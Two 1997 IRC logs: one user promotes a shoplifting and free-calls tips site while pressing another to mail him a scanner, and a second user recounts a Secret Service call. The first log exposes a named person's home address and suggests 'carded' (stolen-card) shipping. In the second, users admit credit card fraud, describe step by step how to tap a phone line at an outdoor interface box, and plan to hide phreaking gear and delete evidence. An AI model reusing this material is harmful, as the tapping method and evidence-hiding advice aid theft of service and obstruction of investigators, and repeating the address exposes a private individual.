<ZeR0-HeX> Go to www.createch.net/zerohex/zer0.html If you need any tips on Shoplifting, Free Premium Channels, Free Phone Calls, Free Clothes, and many more things like these. This is the site. Please sign the guestbook. <Keystrike> hi <Keystrike> yes <Keystrike> i am pcexpokey <Keystrike> member? <Keystrike> 16/f.... [21:06] <ZeR0-HeX> i changed the name [21:06] <ZeR0-HeX> to Zer0 Issues [21:06] <ZeR0-HeX> Go to www.createch.net/zerohex/zer0.html If you need any tips on Shoplifting, Free Premium Channels, Free Phone Calls, Free Clothes, and many more things like these. This is the site. Please sign the guestbook. [21:06] <ZeR0-HeX> go check it out <Keystrike> cool [21:06] <ZeR0-HeX> oh yeah [21:06] <ZeR0-HeX> hey [21:06] <ZeR0-HeX> sup [21:07] <ZeR0-HeX> can you go to my web site [21:07] <ZeR0-HeX> and sign my guestbook [21:07] <ZeR0-HeX> and i'd appreciate it if you like told some of your friends bout my site [21:07] <ZeR0-HeX> i know [21:07] <ZeR0-HeX> say "age/sex" [21:07] <ZeR0-HeX> go in #reality and do it <Keystrike> sure [21:07] <ZeR0-HeX> wow, 1st time a woman has ever been interested in this site <Keystrike> hehe [21:08] <ZeR0-HeX> :-) [21:08] <ZeR0-HeX> :-) Session Close: Tue Jun 24 21:12:07 1997 Session Start: Tue Jun 24 21:37:04 1997 [21:37] <ZeR0-HeX> dont' tell anyone <Keystrike> I wont :) <Keystrike> How can I verify it though? [21:37] <ZeR0-HeX> first name is Faraz [21:37] <ZeR0-HeX> last name is Alam [21:37] <ZeR0-HeX> go to #teenflirters [21:37] <ZeR0-HeX> ask people there <Keystrike> Faraz? <Keystrike> hehe [21:37] <ZeR0-HeX> ask nancy <Keystrike> ok <Keystrike> I believe ya ;) [21:37] <ZeR0-HeX> and bluejewel [21:37] <ZeR0-HeX> uh huh [21:37] <ZeR0-HeX> go in ther [21:37] <ZeR0-HeX> e <Keystrike> hmmm <Keystrike> where in ct do you live? [21:40] <ZeR0-HeX> near hartford <Keystrike> hmmm <Keystrike> i dont know ct very well ;) [21:41] <ZeR0-HeX> i'll tell you the town and everything [21:41] <ZeR0-HeX> if ur interested in sending me ur scanner [21:41] <ZeR0-HeX> i dunno nj very well :-) [21:41] <ZeR0-HeX> diana [21:41] <ZeR0-HeX> seriously [21:41] <ZeR0-HeX> you can trust me [21:41] <ZeR0-HeX> i won't do anything [21:41] <ZeR0-HeX> how bout this.. [21:41] <ZeR0-HeX> i'll even send you the money 1st, for the shipping and all <Keystrike> hmmmm <Keystrike> well, if i have your addy and stuff, i suppose its pretty safe :) [21:42] <ZeR0-HeX> my address? [21:42] <ZeR0-HeX> ok, but you can't tell anyone <Keystrike> addy == address <Keystrike> I wont [21:42] <ZeR0-HeX> absolutely nobody <Keystrike> but <Keystrike> How can I be sure thats it? [21:42] <ZeR0-HeX> uh huh [21:42] <ZeR0-HeX> i no <Keystrike> hehe [21:42] <ZeR0-HeX> wait [21:42] <ZeR0-HeX> what's ur last name? [21:42] <ZeR0-HeX> 1st [21:42] <ZeR0-HeX> :-) [21:43] <ZeR0-HeX> same process over you <Keystrike> not some drop off point <Keystrike> hehe <Keystrike> u want my stuff too? <Keystrike> I guess you need that anyway so u can pay for the shipping <Keystrike> right? <Keystrike> My last name is... <Keystrike> <drumb rool> <Keystrike> roll rather [21:44] <ZeR0-HeX> uh huh [21:44] <ZeR0-HeX> u there?.. [21:44] <ZeR0-HeX> huh? [21:44] <ZeR0-HeX> drumb rool? [21:44] <ZeR0-HeX> haha <Keystrike> Fitger [21:44] <ZeR0-HeX> not funny <Keystrike> sorry [21:44] <ZeR0-HeX> :-) [21:44] <ZeR0-HeX> whta is it really <Keystrike> hehe [21:44] <ZeR0-HeX> Diana Fitger [21:44] <ZeR0-HeX> ?? <Keystrike> yup * Keystrike is german [21:45] <ZeR0-HeX> k [21:45] <ZeR0-HeX> Faraz Alam here [21:45] <ZeR0-HeX> hey [21:45] <ZeR0-HeX> kewl [21:45] <ZeR0-HeX> i was born in germany [21:45] <ZeR0-HeX> frankfurt, amazing heh? <Keystrike> cool :) <Keystrike> hehehe <Keystrike> Im like not all german though <Keystrike> italian too [21:45] <ZeR0-HeX> neither am I [21:45] <ZeR0-HeX> i'm pakistani <Keystrike> but thats my mothers side [21:45] <ZeR0-HeX> :-) <Keystrike> nifty :) [21:45] <ZeR0-HeX> uh huh [21:45] <ZeR0-HeX> ok *** ^scream^ is on IRC [21:46] <ZeR0-HeX> before i tell you everything bout me <Keystrike> hehe [21:46] <ZeR0-HeX> you will agree to send me the scanner then? <Keystrike> yes =p [21:46] <ZeR0-HeX> :-) <Keystrike> im not sure how to ship it <Keystrike> i have a handman too <Keystrike> i can send that? [21:46] -ec|ipse- (Wall:#Phreak) cawnf cawnf? [21:47] <ZeR0-HeX> um.. [21:47] <ZeR0-HeX> hehe [21:47] <ZeR0-HeX> whatever [21:47] <ZeR0-HeX> the pic you have [21:47] -shoelace- still on [21:47] <ZeR0-HeX> a color scanner [21:47] -shoelace- might be busted [21:47] <ZeR0-HeX> would be all <Keystrike> yes <Keystrike> oke,y [21:47] <ZeR0-HeX> k [21:47] <ZeR0-HeX> what's that called? [21:47] <ZeR0-HeX> ur color scanner? <Keystrike> logitech i believe <Keystrike> oh <Keystrike> the flatbed is also color [21:48] <ZeR0-HeX> oh [21:48] <ZeR0-HeX> do i uh.. <Keystrike> its an hp 4c [21:48] <ZeR0-HeX> have to insert photos [21:48] <ZeR0-HeX> or just like click a button like you did <Keystrike> its ez to use [21:48] <ZeR0-HeX> and it takes a pic <Keystrike> insert em [21:48] <ZeR0-HeX> do i insert photos? [21:48] <ZeR0-HeX> oh [21:48] <ZeR0-HeX> damn <Keystrike> yes [21:48] <ZeR0-HeX> i don't have that many pics of me [21:48] <ZeR0-HeX> :-( [21:48] <ZeR0-HeX> yuo can't just like shoot it <Keystrike> u can just take pics with a poloraid or whatever [21:48] <ZeR0-HeX> at yourself <Keystrike> well <Keystrike> you can sorta <Keystrike> put your head on the scanner <Keystrike> and scan :P [21:49] <ZeR0-HeX> you did didn't you? [21:49] <ZeR0-HeX> yeah [21:49] <ZeR0-HeX> you did that? ur holding that little button aren't ya? [21:49] <ZeR0-HeX> like a timer? <Keystrike> well, that was the camera [21:49] <ZeR0-HeX> oh, ok [21:49] <ZeR0-HeX> hey [21:49] <ZeR0-HeX> how bout this [21:50] <ZeR0-HeX> um, go to the post office tomorow, [21:50] <ZeR0-HeX> and ask them [21:50] <ZeR0-HeX> how much it'd cost [21:50] <ZeR0-HeX> to send it in a box or whatever <Keystrike> i can look that up [21:50] <ZeR0-HeX> yeah <Keystrike> www.usps.gov [21:50] <ZeR0-HeX> i think so [21:50] <ZeR0-HeX> find a way [21:50] <ZeR0-HeX> yeah [21:50] <ZeR0-HeX> also [21:50] <ZeR0-HeX> uh, fedex.com [21:50] <ZeR0-HeX> or something <Keystrike> yup [21:50] <ZeR0-HeX> and uspostal.com [21:51] <ZeR0-HeX> etc. [21:51] <ZeR0-HeX> then uh.. [21:51] <ZeR0-HeX> hmm... can't really talk to you on the phone [21:51] <ZeR0-HeX> unless you call <Keystrike> the fedex people come to our house evey day [21:51] <ZeR0-HeX> cause my parents won't allow women to call me on the phon [21:51] <ZeR0-HeX> e <Keystrike> cause we always send out packs [21:51] <ZeR0-HeX> i can't even talk to um <Keystrike> heheheehhehe [21:51] <ZeR0-HeX> damn religion :-) <Keystrike> why not? [21:51] <ZeR0-HeX> oh, kool [21:51] <ZeR0-HeX> it's just [21:51] <ZeR0-HeX> really strict <Keystrike> auu :/ [21:52] <ZeR0-HeX> we're not allowed to have relationships <Keystrike> do they screen your calls? [21:52] <ZeR0-HeX> at such an early age [21:52] <ZeR0-HeX> it sucks [21:52] <ZeR0-HeX> i no [21:52] <ZeR0-HeX> so [21:52] <ZeR0-HeX> tomorrow [21:52] <ZeR0-HeX> just like ask the guy [21:52] <ZeR0-HeX> how much it'd cost [21:52] <ZeR0-HeX> they cause gotta weight it and all [21:52] <ZeR0-HeX> huh? <Keystrike> i can see on their site [21:52] <ZeR0-HeX> no [21:52] <ZeR0-HeX> not that strict <Keystrike> its not that heavy [21:52] <ZeR0-HeX> :-) [21:52] <ZeR0-HeX> ok <Keystrike> =p [21:53] <ZeR0-HeX> fer honesty [21:53] <ZeR0-HeX> can you call me? [21:53] -Own3d- You have 2 notes waiting on Own3d. [21:53] -Own3d- For a list, /MSG Own3d NOTES [pass] INDEX [21:53] <ZeR0-HeX> or you can't calll long distance <Keystrike> hmmm *** ^scream^ has left IRC <Keystrike> i could try an extender [21:53] <ZeR0-HeX> k, cause i don't want you think that you can;t trust me [21:53] <ZeR0-HeX> you can <Keystrike> not sure if it will work to all over the us [21:53] <ZeR0-HeX> or [21:53] <ZeR0-HeX> how bout this [21:53] <ZeR0-HeX> you just send it [21:53] <ZeR0-HeX> then *** ^scream^ is on IRC [21:53] <ZeR0-HeX> when i send it back [21:53] <ZeR0-HeX> i'll leave the cash in there [21:53] <ZeR0-HeX> extender? [21:54] <ZeR0-HeX> what's that? <Keystrike> its like <Keystrike> a way to make free calls and shit [21:54] <ZeR0-HeX> oh [21:54] <ZeR0-HeX> kool [21:55] <ZeR0-HeX> do you have another phone line fer yer computer? <Keystrike> yes <Keystrike> but someones on it now [21:55] <ZeR0-HeX> damn [21:55] <ZeR0-HeX> u rich or something! [21:55] <ZeR0-HeX> :-) [21:55] <ZeR0-HeX> lucky woman [21:55] <ZeR0-HeX> :-) [21:55] <ZeR0-HeX> k <Keystrike> hehe <Keystrike> :) <Keystrike> whats your zip code? <Keystrike> it needs it to caculate the payment and stuff [21:56] <ZeR0-HeX> 060... [21:57] <ZeR0-HeX> :-) [21:57] <ZeR0-HeX> ur at the web site [21:57] <ZeR0-HeX> 06029 <Keystrike> http://www.fedex.com/svcform.html <Keystrike> yuppers [21:57] <ZeR0-HeX> kooll [21:57] <ZeR0-HeX> k [21:57] <ZeR0-HeX> that's my zip code [21:57] <ZeR0-HeX> 06029 [21:57] <ZeR0-HeX> what's urs? <Keystrike> 07960 [21:58] <ZeR0-HeX> you can like make out a bullshit order to someone you hate [21:58] <ZeR0-HeX> 06029 <Keystrike> i dont think so <Keystrike> it wants other stuff <Keystrike> this is just like a caculator [21:58] <ZeR0-HeX> oh <Keystrike> im not doing the actual order thingy now <Keystrike> EAST BERLIN , CT <Keystrike> ? [21:59] <ZeR0-HeX> lol.. [21:59] <ZeR0-HeX> damn.. <Keystrike> FedEx Economy Two-Day Service sm <Keystrike> Service Commitment: Friday, 04:30 PM 06/27/97 [21:59] <ZeR0-HeX> ur one town away from where my girlfriend lives [21:59] <ZeR0-HeX> she lives in Berlin CT <Keystrike> thats what it said for your addy :P <Keystrike> Origin: MORRISTOWN , NJ <Keystrike> thats what it sayd for mine [22:00] <ZeR0-HeX> that's not it <Keystrike> heh [22:00] <ZeR0-HeX> i live 40 min. away from her [22:00] <ZeR0-HeX> my zip is 06029 <Keystrike> maybe thats the dropoff thing [22:00] <ZeR0-HeX> and i live in ellington, ct [22:00] <ZeR0-HeX> probably where fed ex is located [22:00] <ZeR0-HeX> their main office <Keystrike> yup [22:01] <ZeR0-HeX> hmm [22:01] <ZeR0-HeX> that thing is complex [22:01] <ZeR0-HeX> :-) [22:01] <ZeR0-HeX> lol <Keystrike> damn <Keystrike> this no work [22:03] <ZeR0-HeX> huh?.. <Keystrike> the caculator <Keystrike> it dosnt say a cost <Keystrike> sec [22:04] <ZeR0-HeX> yep [22:04] <ZeR0-HeX> hey [22:04] <ZeR0-HeX> if i got disconnected [22:04] <ZeR0-HeX> e-mail me at zer0-hex@juno.com [22:04] <ZeR0-HeX> ok? [22:04] <ZeR0-HeX> or farazalam@juno.com [22:04] <ZeR0-HeX> okkies? [22:04] <ZeR0-HeX> or go to the web site <Keystrike> ok <Keystrike> why would u disconnect? *** ^scream^ has left IRC [22:05] <ZeR0-HeX> k [22:05] <ZeR0-HeX> what's your e-mail address? [22:05] <ZeR0-HeX> cause [22:05] <ZeR0-HeX> my folks [22:05] <ZeR0-HeX> they don't want me online [22:05] <ZeR0-HeX> i'm home alone right now [22:05] <ZeR0-HeX> and they're gonna come any min. *** Krusty has left IRC <Keystrike> If you mail your 10 pound 0 ounce Priority Mail package <Keystrike> from MORRISTOWN, NJ 07960 to ELLINGTON, CT 06029 (zone 2), <Keystrike> we estimate your package will arrive in 2 Day(s). <Keystrike> The price is: <Keystrike> Priority Mail Service $7.80 <Keystrike> Certified Mail $1.35 <Keystrike> Restricted Delivery $2.75 <Keystrike> Return Receipt $1.10 <Keystrike> ------------------------------------------- <Keystrike> TOTAL CHARGES $13.00 [22:22] <ZeR0-HeX> sup [22:22] <ZeR0-HeX> what happened? <Keystrike> hey <Keystrike> 13 dollars <Keystrike> wb Session Start: Tue Jul 01 01:12:37 1997 [1:12] <ZeR0-HeX> hi!!!!! [1:12] <ZeR0-HeX> what's up?? [1:12] <ZeR0-HeX> where have you been? <Keystroke> I corrupted my bios <Keystroke> heh [1:13] <ZeR0-HeX> GOOD JOB [1:13] <ZeR0-HeX> :-) [1:13] <ZeR0-HeX> hey [1:13] <ZeR0-HeX> what's ur e-mail address? [1:13] <ZeR0-HeX> my web site is gone :-( <Keystroke> :( <Keystroke> Why? [1:13] <ZeR0-HeX> cause <Keystroke> wakka@hotmail.com <Keystroke> why? [1:13] <ZeR0-HeX> my web hosting service wan't making enuff [1:13] <ZeR0-HeX> money <Keystroke> heheh <Keystroke> :(( <Keystroke> damn [1:14] <ZeR0-HeX> i put up 3 more issues though <Keystroke> did u sign a contract or anything? [1:14] <ZeR0-HeX> you want me to dcc them to you? [1:14] <ZeR0-HeX> k, thanks <Keystroke> do you have em on a site now? [1:14] <ZeR0-HeX> you know mine [1:14] <ZeR0-HeX> awww [1:14] <ZeR0-HeX> it'll go back up [1:14] <ZeR0-HeX> i gotta find somewhere [1:14] <ZeR0-HeX> no <Keystroke> cool [1:14] <ZeR0-HeX> nope [1:15] <ZeR0-HeX> i'm looking fer something better than angelfire and geocities <Keystroke> your isp? <Keystroke> aol or ibm? [1:15] <ZeR0-HeX> they both suck [1:15] <ZeR0-HeX> hey, did you find anything bout fed-e [1:15] <ZeR0-HeX> x <Keystroke> 13$ us post [1:16] <ZeR0-HeX> and the prices? [1:16] <ZeR0-HeX> carded <Keystroke> carded? [1:16] <ZeR0-HeX> :-) [1:16] <ZeR0-HeX> oh [1:16] <ZeR0-HeX> what bout back? <Keystroke> does #reality have a page? <Keystroke> same thing [1:17] <ZeR0-HeX> uh huh, i don't pay fer it. i ripped it off <Keystroke> 13 dollars <Keystroke> heh <Keystroke> what if they confiscate my scanner?! [1:17] <ZeR0-HeX> oh [1:17] <ZeR0-HeX> k [1:17] <ZeR0-HeX> why would they? <Keystroke> if it was carded <Keystroke> hehah [1:17] <ZeR0-HeX> it's illegal. you can sue them for going through your mail [1:17] <ZeR0-HeX> what? [1:17] <ZeR0-HeX> lol <Keystroke> heh <Keystroke> want i call ya? [1:18] <ZeR0-HeX> funny woman [1:18] <ZeR0-HeX> :-) [1:18] <ZeR0-HeX> huh? <Keystroke> heh <Keystroke> funny? [1:18] <ZeR0-HeX> u wanna gimme a call? <Keystroke> why not? <Keystroke> hehe [1:18] <ZeR0-HeX> lol [1:18] <ZeR0-HeX> well, now, diana, i don't think we should start anything. i do have a girlfriend and all [1:19] <ZeR0-HeX> :-) <Keystroke> hehe [1:19] <ZeR0-HeX> j/k <Keystroke> :p [1:19] <ZeR0-HeX> seriousl though, could you call me? <Keystroke> hmmm <Keystroke> i guess [1:21] <ZeR0-HeX> brb [1:21] <ZeR0-HeX> ok? <Keystroke> k [1:23] <ZeR0-HeX> ok [1:23] <ZeR0-HeX> backers [1:23] <ZeR0-HeX> so [1:23] <ZeR0-HeX> uh [1:23] <ZeR0-HeX> the scanner [1:23] <ZeR0-HeX> what do you wanna do? <Keystroke> mail <Keystroke> us post [1:24] <ZeR0-HeX> us postal or fed-ex [1:24] <ZeR0-HeX> ?? <Keystroke> us postal [1:25] <ZeR0-HeX> ok [1:26] <ZeR0-HeX> so, ur up fer it and all? <Keystroke> yup <Keystroke> hehe [1:26] <ZeR0-HeX> ok [1:26] <ZeR0-HeX> um [1:26] <ZeR0-HeX> 1st, you have to trust me. <Keystroke> i do [1:27] <ZeR0-HeX> so, we need to talk on the phone so you think i won't rip you off <Keystroke> ok [1:27] <ZeR0-HeX> no' [1:27] <ZeR0-HeX> just in case [1:27] <ZeR0-HeX> r u sure? [1:27] <ZeR0-HeX> absolutely? positively? <Keystroke> umm hmm <Keystroke> hehe [1:27] <ZeR0-HeX> even though i make texts bout shoplifting :-) <Keystroke> hah <Keystroke> :P [1:27] <ZeR0-HeX> see <Keystroke> k [1:28] <ZeR0-HeX> you still don't trust me [1:28] <ZeR0-HeX> that's why we gotta talk over da fone <Keystroke> I do [1:28] <ZeR0-HeX> ok [1:28] <ZeR0-HeX> just one thing [1:28] <ZeR0-HeX> um [1:28] <ZeR0-HeX> i'm not gonna be home this week [1:28] <ZeR0-HeX> i'm leaving on thursday to PA [1:28] <ZeR0-HeX> and am coming back on next monday [1:28] <ZeR0-HeX> so uh.. <Keystroke> yes? [1:29] <ZeR0-HeX> how do you want me to give you the money and all? <Keystroke> ship it back in the scanner box [1:29] <ZeR0-HeX> ok [1:29] <ZeR0-HeX> it'll cost me 13 bucks too? [1:29] <ZeR0-HeX> by us postal? [1:29] <ZeR0-HeX> or what? <Keystroke> yup :/ [1:30] <ZeR0-HeX> ok [1:30] <ZeR0-HeX> can it be anything else? [1:30] <ZeR0-HeX> or does it HAVE to be us post? <Keystroke> well thats the cheapest [1:30] <ZeR0-HeX> thank you for the 3 werd answers btw :-) [1:30] <ZeR0-HeX> ok [1:30] <ZeR0-HeX> how many days can i borrow it? <Keystroke> np <Keystroke> a week <Keystroke> :P [1:31] <ZeR0-HeX> thanks!!! [1:31] <ZeR0-HeX> :-) <Keystroke> np [1:31] <ZeR0-HeX> $26 bucks is a good deal i gess <Keystroke> tis ;) [1:31] <ZeR0-HeX> r u giving me 2 scanners or what? <Keystroke> 1 <Keystroke> giving?! :P [1:31] <ZeR0-HeX> i mean [1:31] <ZeR0-HeX> borrowing!! [1:31] <ZeR0-HeX> you no what i mean [1:32] <ZeR0-HeX> i won't rip you off!! [1:32] <ZeR0-HeX> trust me!! [1:32] <ZeR0-HeX> does it only scan pictures or what? cause i don't have any pics! or is it like a timed one, where you can just point it and it'll shoot <Keystroke> it scans all [1:33] <ZeR0-HeX> ok, kool [1:33] <ZeR0-HeX> color right? [1:33] <ZeR0-HeX> like the picture you have? <Keystroke> yes [1:33] <ZeR0-HeX> ok, kool [1:34] <ZeR0-HeX> when r u gonna send it?? <Keystroke> hmmm <Keystroke> soon <Keystroke> whats your # <Keystroke> well <Keystroke> when u need it? [1:35] <ZeR0-HeX> #? phone # [1:35] <ZeR0-HeX> is it next day air? <Keystroke> yes [1:35] <ZeR0-HeX> or what? <Keystroke> yes [1:36] <ZeR0-HeX> oh, ok..... [1:36] <ZeR0-HeX> hmm.. [1:36] <ZeR0-HeX> well uh. [1:36] <ZeR0-HeX> k, i got an idea <Keystroke> yes? [1:36] <ZeR0-HeX> think you can send it out tomorrow? <Keystroke> uhmmmmm <Keystroke> yes [1:37] <ZeR0-HeX> do you have like a box and all? <Keystroke> yes <Keystroke> :P <Keystroke> hehehe [1:38] <ZeR0-HeX> what/? [1:38] <ZeR0-HeX> what's os funny bout that [1:38] <ZeR0-HeX> hehe <Keystroke> i keep saying yes :P [1:39] <ZeR0-HeX> oh, :-) [1:39] <ZeR0-HeX> ok [1:39] <ZeR0-HeX> so i gess you must want my address then huh? [1:41] <ZeR0-HeX> i gess not [1:41] <ZeR0-HeX> :-) <Keystroke> sorry <Keystroke> :) <Keystroke> I was finding something <Keystroke> a txt file [1:44] <ZeR0-HeX> its ok <Keystroke> its very important and i lost it <Keystroke> brb [1:45] <ZeR0-HeX> oh ok, take ur time <Keystroke> yes! <Keystroke> found it [1:45] <ZeR0-HeX> :-) [1:46] <ZeR0-HeX> what is it? if you don't mind me asking? <Keystroke> someone sent it to me who was going on vacation <Keystroke> and told me to give it to someone else <Keystroke> by today :( <Keystroke> and cause my puter was broken, well.... [1:46] <ZeR0-HeX> oh <Keystroke> didnt get a chance to [1:47] <ZeR0-HeX> sowwery :-( <Keystroke> I found it now :) [1:47] <ZeR0-HeX> do you already have my address? <Keystroke> nope [1:47] <ZeR0-HeX> k [1:48] <ZeR0-HeX> gimme yours right after [1:48] <ZeR0-HeX> don't send me a bomb [1:48] <ZeR0-HeX> :-) <Keystroke> heheheh <Keystroke> Maybe not :P <Keystroke> j/k [1:48] <ZeR0-HeX> k [1:48] <ZeR0-HeX> here it is : Faraz Alam [1:48] <ZeR0-HeX> 9 Deerfield Dr. [1:48] <ZeR0-HeX> Ellington, CT 06029 <Keystroke> okey [1:48] <ZeR0-HeX> don't [1:48] <ZeR0-HeX> wait..... <Keystroke> 192 Market Street <Keystroke> yes? <Keystroke> market street sucks [1:49] <ZeR0-HeX> is it gonna be deliveried during the daytime? [1:49] <ZeR0-HeX> what time? [1:49] <ZeR0-HeX> do you know? <Keystroke> umm hmm <Keystroke> when your mail comes? [1:49] <ZeR0-HeX> oh [1:49] <ZeR0-HeX> it comes then [1:49] <ZeR0-HeX> ok [1:49] <ZeR0-HeX> cause [1:49] <ZeR0-HeX> remembe [1:49] <ZeR0-HeX> r [1:49] <ZeR0-HeX> my religion [1:49] <ZeR0-HeX> my parents would be pissed if they saw a girls' name a on my letter <Keystroke> hehe <Keystroke> Ill write Bubba <Keystroke> from bubba [1:50] <ZeR0-HeX> (thinks he found a homepage fer his issues..) [1:50] <ZeR0-HeX> um [1:50] <ZeR0-HeX> how bout this [1:50] <ZeR0-HeX> have your address on it [1:50] <ZeR0-HeX> but right a guys name [1:50] <ZeR0-HeX> ok? <Keystroke> ok <Keystroke> cool <Keystroke> url? [1:50] <ZeR0-HeX> can you do that? [1:51] <ZeR0-HeX> www.tripod.com [1:51] <ZeR0-HeX> still looking <Keystroke> yup [1:51] <ZeR0-HeX> i need something that allows illegal activities <Keystroke> hmmmm [1:51] <ZeR0-HeX> or else they terminate it in a day after viewing it <Keystroke> something? <Keystroke> they? [1:52] <ZeR0-HeX> iv.Pages that promote illegal activity. [1:52] <ZeR0-HeX> the isp [1:52] <ZeR0-HeX> damn <Keystroke> i c :) [1:52] <ZeR0-HeX> hmmm... [1:52] <ZeR0-HeX> i'll take a chance and build the web site [1:52] <ZeR0-HeX> see what happens [1:52] <ZeR0-HeX> ok <Keystroke> hehe [1:52] <ZeR0-HeX> go on with ur address <Keystroke> good luck [1:53] <ZeR0-HeX> thanks :-) <Keystroke> np <Keystroke> ok <Keystroke> i go address the box now <Keystroke> bbl :) [1:53] <ZeR0-HeX> huh? [1:53] <ZeR0-HeX> gimme ur address [1:53] <ZeR0-HeX> ur gonna make the box now? [1:53] <ZeR0-HeX> at 1:54 am? :-) Session Close: Tue Jul 01 02:14:31 1997 Session Start: Fri Jul 11 14:29:07 1997 [14:29] <ZeR0-HeX> heyyyyyyyyyyyyyyyyyyyy!!!!!!! * Keystrike is away *BRB* [14:29] <ZeR0-HeX> ok [14:29] <ZeR0-HeX> you better!! i need to talk to you!! Session Close: Fri Jul 11 14:30:21 1997 Session Start: Fri Jul 11 14:37:01 1997 [14:37] <ZeR0-HeX> back yet? Session Close: Fri Jul 11 14:39:49 1997 Session Start: Fri Jul 11 14:59:30 1997 [14:59] <ZeR0-HeX> u there? Session Close: Fri Jul 11 14:59:38 1997 Session Start: Fri Jul 11 16:04:03 1997 [16:04] <ZeR0-HeX> hi, u there? Session Close: Fri Jul 11 16:04:24 1997 Session Start: Fri Jul 11 16:19:04 1997 [16:19] <ZeR0-HeX> hey u there???????!~!!!!!!!!!! Session Close: Fri Jul 11 16:19:09 1997 2. sho.log - shoelace telling Keystroke about his visit from the SS. [9:49] *** shoelace (funkdat@bull-max43.dynamic.usit.net) has joined #DowNINit [9:50] <shoelace> hi k0w.com [9:50] <shoelace> guess what happened this morning? <Keystroke> what? <Keystroke> u harass OCI? [9:50] <shoelace> i'll tell u in here [9:50] <shoelace> um [9:50] *** W sets mode: +o Keystroke [9:51] <shoelace> i was just awoken five minutes ago [9:51] *** Keystroke sets mode: +o shoelace <Keystroke> cool [9:51] <shoelace> and my mom told me that the secret service had just called neeeding to talk to my dad [9:51] <shoelace> and she said, she being the secret service person [9:51] <shoelace> that our number keeps coming up on their screens [9:51] <shoelace> part two [9:51] <shoelace> first <Keystroke> :/ [9:52] <shoelace> why would my main line, the one being for my parents [9:52] <shoelace> come up on their screens, when the only thing i ever do is with my computer line [9:52] <shoelace> fuck [9:52] <shoelace> fuc [9:52] <shoelace> fuck [9:52] <shoelace> part three [9:52] <shoelace> the first thing i thought of was my credit card fraud <Keystroke> what # did the secret service call from? ill prank em! [9:53] <shoelace> but how could that be it, if the only thing i have done is on MY fone line? [9:53] <shoelace> hmmm.. <Keystroke> did u ever call NE1 rpom your parents #? [9:53] <shoelace> dont know [9:53] <shoelace> we dont have caller id <Keystroke> from <Keystroke> *69! :P <Keystroke> hmmmm <Keystroke> like [9:53] <shoelace> whats NE1? [9:53] <shoelace> oh <Keystroke> maybe they knew that was a puter line [9:53] <shoelace> anyone [9:53] <shoelace> fuck <Keystroke> if it only calls your ISP <Keystroke> and like the cc#'s [9:53] <shoelace> no [9:53] <shoelace> it calls friends also [9:53] <shoelace> fuck <Keystroke> they still know its not the main line [9:54] <shoelace> it *might* be about the voice mail that dr1x set up for me <Keystroke> what are their screens? [9:54] <shoelace> because Phrax had one, dr1x had one, i had one, and REailty had one <Keystroke> maybe <Keystroke> :/ <Keystroke> all i know is DONT TALK TO ME! <Keystroke> jk :P <Keystroke> maybe your parents did something [9:57] <shoelace> FUCK [9:57] <shoelace> MY MOM JUST CAME DOWN HERE [9:57] <shoelace> she said that this is the deal [9:57] <shoelace> someone has been prank calling the s. s. and leaving obsene messages, and they sound like they are drunk [9:57] <shoelace> here is the deal.. [9:57] <shoelace> beige box [9:57] <shoelace> i DID find my box unscrewed the other day [9:57] <shoelace> no joke [9:58] <shoelace> Key [9:58] <shoelace> can u give me some advice? <Keystroke> sure <Keystroke> someone has been prank calling the s. s. and leaving obsene messages, and they sound like they are drunk?!~! <Keystroke> werd <Keystroke> :( <Keystroke> beige box? <Keystroke> unscrewed? <Keystroke> what ya mean? <Keystroke> the NID? [10:00] <shoelace> nid? [10:00] <shoelace> fuck [10:00] <shoelace> thats what they say.. <Keystroke> what was unsecrewed? [10:00] <shoelace> ok <Keystroke> you were framed dude :/ [10:00] <shoelace> here in tennessee <Keystroke> yes? [10:01] <shoelace> there are the network interface boxes [10:01] <shoelace> u unscrew them [10:01] <shoelace> they are gray little boxes outside [10:01] <shoelace> u unscrew them [10:01] <shoelace> and open them up [10:01] <shoelace> and there is a small fone jack with a line in it [10:01] <shoelace> u take out the line [10:01] <shoelace> and plug in the fone [10:01] <shoelace> a cheap/easy beige box [10:01] <shoelace> goddamnit <Keystroke> yours was unsecrewed? <Keystroke> well [10:02] <shoelace> yes <Keystroke> its something done recently... [10:02] <shoelace> ja <Keystroke> cause the SS dosnt think its nething big <Keystroke> kids fooling around <Keystroke> its not like they are waiting <Keystroke> and think they can make a big bust <Keystroke> done yesterday, the day b4 or this morning <Keystroke> when was the NID open? <Keystroke> but now like <Keystroke> they may investiagte u <Keystroke> and find what u did with CC#'s [10:03] <shoelace> nah man [10:03] <shoelace> im gonna del everything [10:03] <shoelace> hide my redbox <Keystroke> u better [10:03] <shoelace> fucking del all my anarchist shit [10:03] <shoelace> delete fucking everything <Keystroke> uhm [10:03] <shoelace> I GN0 <Keystroke> netscape too [10:04] <shoelace> I'LL HAX0R THEM [10:04] <shoelace> yea yea <Keystroke> when u did thoes conf's [10:04] <shoelace> and del all my 0-day pron <Keystroke> they were logged <Keystroke> hehe <Keystroke> did u use a proxy? [10:04] <shoelace> proxy? <Keystroke> umm hmm <Keystroke> did u connect directally? [10:04] <shoelace> no <Keystroke> how did u connect? [10:05] <shoelace> i didnt even use my own account [10:05] <shoelace> well i dialed in and all <Keystroke> good <Keystroke> thats ok <Keystroke> they wun look at that [10:05] <shoelace> good <Keystroke> hopefully <Keystroke> probably [10:06] <shoelace> yea [10:07] <shoelace> well [10:07] <shoelace> tell everyone to give me best wishes [10:07] <shoelace> im gonna go fix my computer so i dont get fucked over hard [10:07] <shoelace> see ya <Keystroke> k [10:07] *** shoelace has quit IRC (I'm the cherry on the top of your ice cream...) <Keystroke> :( <Keystroke> ill be back in an hour *** Retrieving #downinit channel info... [10:34] *** Justyfied (j_n3@ppp273.localnet.com) has joined #downinit [10:35] *** Justyfied has quit IRC (Leaving) [10:36] *** Barry has quit IRC (Ping timeout for Barry[martin.barry.edu]) [10:56] *** shoelace (~shoelace@BULL-MAX144.DYNAMIC.USIT.NET) has joined #DowNINit [10:57] <shoelace> Key <Keystroke> hihi [10:58] <shoelace> i have a new thing [10:58] <shoelace> i called my old vmb that dr1x set up for me <Keystroke> i c [10:58] <shoelace> and cussed some guy out saying to change my password back a while ago <Keystroke> :/ [10:59] <shoelace> do you think that could be anything about it? <Keystroke> naaaa [10:59] <shoelace> FUCK [10:59] *** shoelace has quit IRC (GOTTA CHANGE MY USER ID TO FUNKDAT, BRB) [11:01] *** shoelace (~funkdat@BULL-MAX144.DYNAMIC.USIT.NET) has joined #DowNINit <Keystroke> why new ident? [11:02] <shoelace> whY? [11:02] <shoelace> because the bots read funkdat [11:02] <shoelace> not shoelace <Keystroke> i c <Keystroke> heh [11:04] <shoelace> fuck [11:04] <shoelace> heeh [11:04] <shoelace> thanks for the note [11:04] 